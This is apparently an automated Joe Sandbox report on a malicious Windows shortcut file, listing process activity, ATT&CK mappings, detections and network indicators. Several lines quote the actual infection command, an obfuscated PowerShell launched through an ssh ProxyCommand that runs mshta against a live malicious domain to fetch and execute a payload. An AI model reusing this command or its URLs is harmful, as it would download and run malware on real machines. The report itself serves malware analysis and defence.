Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1647Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1496Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1726Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 726Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5500Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228Thread sleep count: 1647 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228Thread sleep count: 1496 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3220Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6308Thread sleep count: 1726 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1588Thread sleep count: 726 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4988Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2688Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: svchost.exe, 00000007.00000002.3604441727.000002350E62B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CF17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3604352911.000001AA7CF67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3607034044.0000023513C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
Source: ssh.exe, 00000001.00000002.3602296428.000001BAFA23A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99[ZP
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\mshta.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://klipzynigou.shop/An4me.mp4"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://klipzynigou.shop/An4me.mp4Jump to behavior
Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command '[ljqom0_ffu}{mshta https://klipzynigou.shop/an4me.mp4[ljqom0_ffu}{'.substring(13, 40)" .
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter
1
DLL Side-Loading
11
Process Injection
11
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote Services1
Email Collection
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory11
Process Discovery
Remote Desktop Protocol1
Archive Collected Data
3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582823 Sample: HngJMpDqxP.lnk Startdate: 31/12/2024 Architecture: WINDOWS Score: 76 29 klipzynigou.shop 2->29 37 Antivirus detection for URL or domain 2->37 39 Windows shortcut file (LNK) starts blacklisted processes 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 3 other signatures 2->43 9 ssh.exe 2 2->9         started        12 svchost.exe 1 1 2->12         started        signatures3 process4 dnsIp5 47 Windows shortcut file (LNK) starts blacklisted processes 9->47 16 powershell.exe 7 9->16         started        19 conhost.exe 1 9->19         started        33 127.0.0.1 unknown unknown 12->33 27 C:\ProgramData\Microsoft27etwork\...\qmgr.jfm, COM 12->27 dropped file6 signatures7 process8 signatures9 35 Windows shortcut file (LNK) starts blacklisted processes 16->35 21 powershell.exe 7 16->21         started        process10 signatures11 45 Windows shortcut file (LNK) starts blacklisted processes 21->45 24 mshta.exe 16 21->24         started        process12 dnsIp13 31 klipzynigou.shop 188.114.97.3, 443, 49718, 49719 CLOUDFLARENETUS European Union 24->31

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
HngJMpDqxP.lnk32%VirustotalBrowse
HngJMpDqxP.lnk32%ReversingLabsShortcut.Trojan.Pantera
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637l0%Avira URL Cloudsafe
https://klipzynigou.shop/cdn-cgi/styles/cf.errors.css0%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4I0%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4H0%Avira URL Cloudsafe
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637.0%Avira URL Cloudsafe
https://klipzynigou.shop/cdn-cgi/phish-bypasss0%Avira URL Cloudsafe
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?13767556370%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4-20%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4mJ0%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4https://klipzynigou.shop/An4me.mp40%Avira URL Cloudsafe
https://klipzynigou.shop/cdn-cgi/phish-bypass:g0%Avira URL Cloudsafe
https://klipzynigou.shop/cdn-cgi/styles/cf.errors.cssU0%Avira URL Cloudsafe
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637:0%Avira URL Cloudsafe
https://klipzynigou.shop/cdn-cgi/phish-bypasse0%Avira URL Cloudsafe
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637N0%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4;J0%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4tJ0%Avira URL Cloudsafe
https://klipzynigou.shop/cdn-cgi/phish-bypass0%Avira URL Cloudsafe
https://klipzynigou.shop/10%Avira URL Cloudsafe
https://klipzynigou.shop/0%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4C:0%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4)0%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4ystem320%Avira URL Cloudsafe
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637P30%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4Hi0%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4100%Avira URL Cloudmalware
https://klipzynigou.shop/An4me.mp4a0%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4yles/cf.errors.css0%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4v0%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4z0%Avira URL Cloudsafe
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637R0%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4y0%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4$global:?0%Avira URL Cloudsafe
https://klipzynigou.shop/An4me.mp4p0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
klipzynigou.shop
188.114.97.3
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://klipzynigou.shop/cdn-cgi/styles/cf.errors.cssfalse
    • Avira URL Cloud: safe
    unknown
    https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637false
    • Avira URL Cloud: safe
    unknown
    https://klipzynigou.shop/An4me.mp4true
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637.mshta.exe, 00000005.00000002.3604352911.000001AA7CF56000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://klipzynigou.shop/cdn-cgi/phish-bypasssmshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://www.cloudflare.com/learning/access-management/phishing-attack/mshta.exe, 00000005.00000002.3608242705.000001B27FB94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3604352911.000001AA7CF67000.00000004.00000020.00020000.00000000.sdmpfalse
      high
      https://klipzynigou.shop/An4me.mp4Imshta.exe, 00000005.00000002.3604352911.000001AA7CEDE000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637lmshta.exe, 00000005.00000002.3608242705.000001B27FB94000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://klipzynigou.shop/An4me.mp4Hmshta.exe, 00000005.00000002.3604926028.000001AA7D0D0000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://klipzynigou.shop/An4me.mp4mJmshta.exe, 00000005.00000002.3604352911.000001AA7CEC5000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://www.cloudflare.com/learning/access-management/phishing-attack/tDmshta.exe, 00000005.00000002.3608242705.000001B27FBDA000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        https://klipzynigou.shop/An4me.mp4-2mshta.exe, 00000005.00000002.3608242705.000001B27FB4C000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://klipzynigou.shop/An4me.mp4https://klipzynigou.shop/An4me.mp4mshta.exe, 00000005.00000002.3610369186.000001B27FD55000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000007.00000003.2422301015.0000023513A40000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drfalse
          high
          http://crl.ver)svchost.exe, 00000007.00000002.3606850826.0000023513C00000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://klipzynigou.shop/cdn-cgi/phish-bypass:gmshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://aka.ms/pscore6powershell.exe, 00000004.00000002.2394149079.000001768A0D9000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637:mshta.exe, 00000005.00000002.3608242705.000001B27FB94000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://klipzynigou.shop/cdn-cgi/phish-bypassemshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://klipzynigou.shop/An4me.mp4;Jmshta.exe, 00000005.00000002.3604352911.000001AA7CEC5000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://klipzynigou.shop/1mshta.exe, 00000005.00000002.3604352911.000001AA7CF17000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://klipzynigou.shop/cdn-cgi/styles/cf.errors.cssUmshta.exe, 00000005.00000002.3608242705.000001B27FB4C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.cloudflare.com/5xx-error-landingmshta.exe, 00000005.00000002.3608242705.000001B27FB4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3604352911.000001AA7CF67000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637Nmshta.exe, 00000005.00000002.3608242705.000001B27FB94000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://klipzynigou.shop/cdn-cgi/phish-bypassmshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://klipzynigou.shop/An4me.mp4tJmshta.exe, 00000005.00000002.3604352911.000001AA7CEC5000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://klipzynigou.shop/mshta.exe, 00000005.00000002.3604352911.000001AA7CF17000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://klipzynigou.shop/An4me.mp4C:mshta.exe, 00000005.00000002.3604352911.000001AA7CEA0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www.cloudflare.com/5xx-error-landingymshta.exe, 00000005.00000002.3608242705.000001B27FB4C000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://g.live.com/odclientsettings/Prod1C:edb.log.7.drfalse
                    high
                    https://www.cloudflare.com/5xx-error-landing:mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://klipzynigou.shop/An4me.mp4)mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://klipzynigou.shop/An4me.mp4ystem32mshta.exe, 00000005.00000002.3604956103.000001AA7D0E0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.cloudflare.com/learning/access-management/phishing-attack/amshta.exe, 00000005.00000002.3604352911.000001AA7CF17000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://klipzynigou.shop/An4me.mp4Himshta.exe, 00000005.00000002.3606198465.000001B27EDC0000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://klipzynigou.shop/An4me.mp4amshta.exe, 00000005.00000002.3604352911.000001AA7CF67000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637Rmshta.exe, 00000005.00000002.3608242705.000001B27FB94000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637P3mshta.exe, 00000005.00000002.3604352911.000001AA7CEDE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://klipzynigou.shop/An4me.mp4vpowershell.exe, 00000004.00000002.2394044056.0000017689BB0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://klipzynigou.shop/An4me.mp4yles/cf.errors.cssmshta.exe, 00000005.00000002.3608242705.000001B27FB4C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://klipzynigou.shop/An4me.mp4ymshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://aka.ms/pscore68powershell.exe, 00000004.00000002.2394149079.000001768A103000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://klipzynigou.shop/An4me.mp4zmshta.exe, 00000005.00000002.3604352911.000001AA7CF17000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2394149079.000001768A0B5000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://crl.vmshta.exe, 00000005.00000002.3604352911.000001AA7CF67000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://www.cloudflare.com/5xx-error-landingnagement/phishing-attack/mshta.exe, 00000005.00000002.3604352911.000001AA7CF56000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://klipzynigou.shop/An4me.mp4$global:?powershell.exefalse
                                • Avira URL Cloud: safe
                                unknown
                                https://klipzynigou.shop/An4me.mp4ppowershell.exe, 00000004.00000002.2394149079.000001768A091000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                188.114.97.3
                                klipzynigou.shopEuropean Union
                                13335CLOUDFLARENETUStrue
                                IP
                                127.0.0.1
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1582823
                                Start date and time:2024-12-31 15:40:26 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 29s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:11
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:HngJMpDqxP.lnk
                                renamed because original name is a hash value
                                Original Sample Name:c90cd850078a3688894afc507e6b9ce8.lnk
                                Detection:MAL
                                Classification:mal76.winLNK@9/11@1/2
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 5
                                • Number of non-executed functions: 2
                                Cookbook Comments:
                                • Found application associated with file extension: .lnk
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.12.23.50
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target mshta.exe, PID 6096 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 6788 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                TimeTypeDescription
                                09:41:48API Interceptor1x Sleep call for process: mshta.exe modified
                                09:41:49API Interceptor2x Sleep call for process: svchost.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                • www.rgenerousrs.store/o362/
                                A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                • www.beylikduzu616161.xyz/2nga/
                                Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                ce.vbsGet hashmaliciousUnknownBrowse
                                • paste.ee/d/lxvbq
                                Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                PO 20495088.exeGet hashmaliciousFormBookBrowse
                                • www.ssrnoremt-rise.sbs/3jsc/
                                QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                • filetransfer.io/data-package/zWkbOqX7/download
